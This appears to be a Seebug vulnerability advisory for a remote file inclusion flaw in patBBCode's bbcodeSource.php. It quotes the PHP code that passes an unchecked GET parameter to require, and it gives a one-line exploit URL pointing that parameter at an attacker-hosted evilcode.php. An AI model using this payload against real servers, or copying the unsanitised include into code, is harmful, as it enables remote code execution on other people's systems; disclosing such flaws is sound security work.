Link to download: http://www.php-tools.net/site.php?file=patBBCode/overview.xml Vuln file: examples\patExampleGen\bbcodeSource.php Vuln code: if( !isset( $_GET['example'] ) ) die( 'No example selected.' ); $exampleId = $_GET['example']; ob_start(); // make the example think it's still in the right place chdir( '../' ); // include the example require $exampleId.'.php'; ob_end_clean(); Exploit: examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论